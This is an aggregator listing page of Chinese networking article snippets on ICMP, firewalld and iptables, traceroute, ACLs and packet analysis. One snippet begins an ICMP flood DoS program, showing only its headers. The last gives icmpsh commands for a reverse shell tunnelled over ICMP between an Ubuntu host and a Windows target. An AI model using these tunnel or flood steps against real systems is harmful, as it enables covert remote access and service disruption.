ICode9

精准搜索请尝试: 精确搜索
  • 06_防火墙相关操作2020-01-01 11:55:48

    软件包:]# yum -y install firewalld]# systemctl start firewalld]# systemctl status firewalld1.查看防火墙区域]# firewall-cmd --get-default-zone2.修改默认区域为public]# firewall-cmd --set-default-zone=public]# firewall-cmd --get-default-zone3.查看public区域规则]#

  • Linux入侵痕迹检测方案【华为云技术分享】2019-12-10 13:55:02

    背景说明 扫描是一切入侵的基础,通过扫描来发现目标主机是否为活动主机、操作系统是什么版本、开放了哪些服务等。扫描技术纷繁复杂,新的扫描技术也层出不穷,不可能穷举所有扫描技术,下面按入侵步骤对主机扫描、端口扫描和服务扫描技术做一个简要分类与概述。 活动主机扫描可分为两

  • 如何在Python中创建ICMP跟踪路由2019-12-01 12:58:29

    我正在尝试在Python中实现基于ICMP的Traceroute. 我发现了一个非常有用的指南(https://blogs.oracle.com/ksplice/entry/learning_by_doing_writing_your),它使我能够创建基于UDP的Traceroute(下面的代码),因此只需要进行修改即可.我尝试将发送套接字更改为ICMP,但是没有例外,我什

  • IP协议32019-11-28 14:51:41

    ICMP   架构IP网络时需要特别注意两点:确认网络是否正常工作,以及遇到异常时进行问题诊断。 ICMP正是提供这类功能的一种协议。 主要功能包括:确认IP包是否成功送达目标地址,通知在发送过程中IP包被废弃的具体原因,改善网络设置等。 ICMP的消息大致可以分为两类:一类是通知出错原

  • ICMP协议2019-11-27 21:03:42

    ICMP是(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要

  • 网络协议抓包分析2019-11-27 14:56:14

    一、网络地址规划表 主机IP 子网掩码 默认网关 MAC地址 192.168.199.42 255.255.255.0 192.168.199.1 D4-6A-6A-C7-02-4B   二、连通性测试           三、应用层         分析 1.客户端请求(红色部分) 请求方法:GET 协议及版本:HTTP

  • traceroute在linux中的使用方法2019-11-27 14:54:49

    traceroute在linux中的使用方法 一、traceroute的实现原理 二、traceroute命令使用方法 1、命令格式 2、常用命令参数 3、使用实例   一、traceroute的实现原理 1、IP协议利用存活时间TTL来发出探测包跟踪数据包到达目标ip主机所经历的路由网关数量,每经过一个路由器,TTL

  • 网络相关的命令工具研究报告2019-11-27 14:01:40

    1.ping命令 ping作为网络相关命令中使用频率最高的程序之一,主要用于确定网络间的连通性,这对确定网络是否连接,以及网络连接的状况十分有用。简单来说,ping就是一个测试程序,如果运行正确,大体上就可以排除网络访问层、网卡、Modem的输入输出线路、电缆和路由器等存在的故障,从而缩小问

  • DOS攻击——ICMP报文洪水攻击2019-11-20 23:03:38

    代码 flooder.h #pragma once #include <iostream> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <arpa/inet.h> #include <linux/types.h> #include <strin

  • 第11章 UDP:用户数据报协-----读书笔记2019-11-19 15:51:59

    1.分片应用程序只关心IP数据报的长度,如果它超过MTU值,那么就要对数据包进行分片。2.UDP首部字段图:     (16位源端口号+16位目端口号+16位UDP长度+16位UDP校验和+数据)3.UDP校验和UDP检验和是一个端到端的检验和。它由发送端计算,然后由接收端验证。其目的是为了发现UDP首部和数据在

  • 第四次实验报告:使用Packet Tracer理解RIP路由协议2019-11-03 18:01:00

    姓名:吴涵阳 学号:201821121073 班级:计算1813 目录 1 实验目的 2 实验内容 3. 实验报告 3.1 建立网络拓扑结构 3.2 配置参数 3.3 测试网络连通性 3.4 理解RIP路由表建立和更新 4. 理解RIP消息传得慢 5. 拓展 1 实验目的 理解RIP路由表的建立与更新 感受RIP坏消息传得慢 2

  • 企业防火墙之iptables2019-10-26 22:00:48

    1.1 企业中安全优化配置原则 尽可能不给服务器配置外网ip ,可以通过代理转发或者通过防火墙映射.并发不是特别大情况有外网ip,可以开启防火墙服务. 大并发的情况,不能开iptables,影响性能,利用硬件防火墙提升架构安全 1.1.1 生产中iptables的实际应用 主要应用方向 1、主机防火墙(f

  • ACL访问控制列表(标准、拓展、命名控制列表)的配置实例2019-10-20 23:55:06

    实例一:标准访问控制列表的配置 拓扑图如下: 通过配置标准访问列表,禁止PC1主机访问PC3主机。 (1)进行sw的配置如下: SW#configure terminal //进入全局模式 Enter configuration commands, one per line. End with CNTL/Z. SW(config)#no ip routing //关闭路由功能 SW(config)#

  • ACL访问控制列表之命名篇(实践)2019-10-15 22:55:15

    实践环境部署 拓扑结构图及需求 注意点:SW设备与SW-3设备需要事先添加容量及业务单板 实践步骤 第一步:配置SW交换机 conf t //进入全局模式,设定vlan10 和20 vlan 10,20 ex do show vlan-sw b //查看vlan信息 VLAN Name Stat

  • 命名性访问控制列表的配置实验2019-10-15 21:56:53

    命名性访问控制列表的配置: 创建ACL: 语法: Router(config)# ip access-list { standard | extended }access-list-name 配置标准命名ACL: 语法: Router(config-std-nac)# [ Sequence-Number ] { permit | deny }source[ source-wildcard ] 配置扩展命名ACL: 语法:router(config-ext-nacl)

  • 命名性访问控制列表的配置实验2019-10-15 21:56:05

    命名性访问控制列表的配置:创建ACL:语法:Router(config)# ip access-list { standard | extended }access-list-name配置标准命名ACL:语法:Router(config-std-nac)# [ Sequence-Number ] { permit | deny }source[ source-wildcard ]配置扩展命名ACL: 语法:router(config-ext-nacl)# [ Seq

  • ACL标准访问控制列表2019-10-15 20:56:33

    ACL访问控制列表结构图 本章目标 学习TCP和UDP协议访问控制列表概述,访问控制列表的工作原理访问控制列表的类型。标准访问控制类表的配置创建ACL将ACLy应用与接口标准ACL的配置实例 一.访问控制列表(ACL) 二.需要背的TCP端口号 端口 协议 说明 20 FTP FTP服务器数据连

  • 命名性访问控制列表的配置实验2019-10-15 20:55:09

    命名性访问控制列表的配置: 创建ACL: 语法: Router(config)# ip access-list { standard | extended }access-list-name 配置标准命名ACL: 语法: Router(config-std-nac)# [ Sequence-Number ] { permit | deny }source[ source-wildcard ] 配置扩展命名ACL: 语法:router(config-ext-nacl)

  • ACL访问控列表之标准版2019-10-13 23:55:08

    访问控制列表简述 访问控制列表(Access Control Lists,简称ACL)是应用在路由器接口的指令列表。这些指令列表用来告诉路由器哪些数据包可以收、哪些数据包需要拒绝。至于数据包是被接收还是拒绝,可以由类似于源地址、目的地址、端口号等的特定指示条件来决定。ACL读取第三层、第四层

  • Linux系统——Firewalld防火墙命令概述2019-10-12 14:56:32

    Firewalld防火墙命令概述 命令列表 选项 说明 --get-default-zone 显示网络连接或接口的默认区域 --set-default-zone=\<zone> 设置网络连接或接口的默认区域 --get-active-zones 显示已激活的所有区域 --get-zone-of-interface=\<interface> 显示指定接口绑定的区域

  • 【转载】ICMP协议2019-10-05 10:55:30

    1.ICMP出现的原因   在IP通信中,经常有数据包到达不了对方的情况。原因是,在通信途中的某处的一个路由器由于不能处理所有的数据包,就将数据包一个一个丢弃了。或者,虽然到达了对方,但是由于搞错了端口号,服务器软件可能不能接受它。这时,在错误发生的现场,为了联络而飞过来的信鸽就是IC

  • 试图在Azure上托管linux vm不起作用2019-10-03 11:51:29

    作为标题,我如何ping我的机器进行一些基本的网络测试?我创建了一个新的VM,但是ping它的公共地址会返回请求超时.解决方法:出于安全原因,默认情况下为Azure VM阻止Ping(source).你可以allow ICMP by configuring appropriate firewall rules或Use port pings instead of ICMP to test

  • 高性能异步批量ping的golang实现2019-10-03 10:55:14

      一个监控项目有个需求,会对一批域名全国的边缘节点进行探测,这里包括,丢包率,http 响应时间,探测频率大概时间是2min 一个周期。这里的域名大概有几百个甚至上千。由于是golang 写的调度和agent, 所以,这里探测丢包率是一个有意思的问题。由于目前git 上没有一个好用的支持multi-ping

  • 防火墙2019-09-25 19:41:57

    四张表 五条链 表名(服务功能的分类) raw 状态跟踪 mangle 打标记 nat 地址转换 filter 过滤表 链名(匹配数据包传输的方向) input 进入防火墙主机的数据包 output 从防火墙主机出去的数据包 forward 经过防火墙主机的数据包 postroution

  • icmp隧道2019-09-24 15:07:18

    本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t host主机ip地址,用于向其发送ping请求。 此

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有